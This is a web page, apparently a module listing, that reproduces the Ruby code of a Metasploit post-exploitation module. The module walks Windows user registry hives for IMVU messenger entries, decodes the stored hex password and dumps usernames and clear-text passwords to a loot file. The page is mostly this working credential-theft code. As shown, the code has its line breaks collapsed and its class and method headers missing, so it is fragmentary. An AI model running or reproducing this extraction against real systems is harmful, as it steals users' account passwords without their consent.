This module extracts account password from IMVU messenger client. It automatically enumerates through the
account files used by IMVU on the system and then dumps the
username & decoded password in clear text.
Module Code
Here is the complete Metasploit code for this module.
## #$Id$ ##
## # This file is part of the Metasploit
Framework and may be subject to # redistribution
and commercial restrictions. Please see the Metasploit #
Framework web site for more information on licensing and terms of
use. # http://metasploit.com/framework/ ##
credcount=0 userhives=load_missing_hives() userhives.each
do |hive| next if hive['HKU'] == nil
print_status("Looking
at Key #{hive['HKU']}") if datastore['VERBOSE'] subkeys =
registry_enumkeys("#{hive['HKU']}\\Software\\IMVU\\") if
subkeys.nil? or subkeys.empty? print_status ("IMVU not installed
for this user.") next end user =
registry_getvaldata("#{hive['HKU']}\\Software\\IMVU\\username\\",
"") hpass =
registry_getvaldata("#{hive['HKU']}\\Software\\IMVU\\password\\",
"") decpass = [
hpass.downcase.gsub(/'/,'').gsub(/\\?x([a-f0-9][a-f0-9])/, '\1')
].pack("H*") print_good("User=#{user}, Password=#{decpass}")
creds << [user, decpass] credcount = (credcount + 1) end
#clean up after ourselves unload_our_hives(userhives)
print_status("#{credcount} Credentials were found.")
if
credcount > 0 print_status("Storing data...") path =
store_loot( 'imvu.user.creds', 'text/plain', session,
creds, 'imvu_user_creds.txt', 'IMVU User Credentials' )
print_status("IMVU user credentials saved in: #{path}") end
end
end
Download
Here is the Metasploit download link to this module.
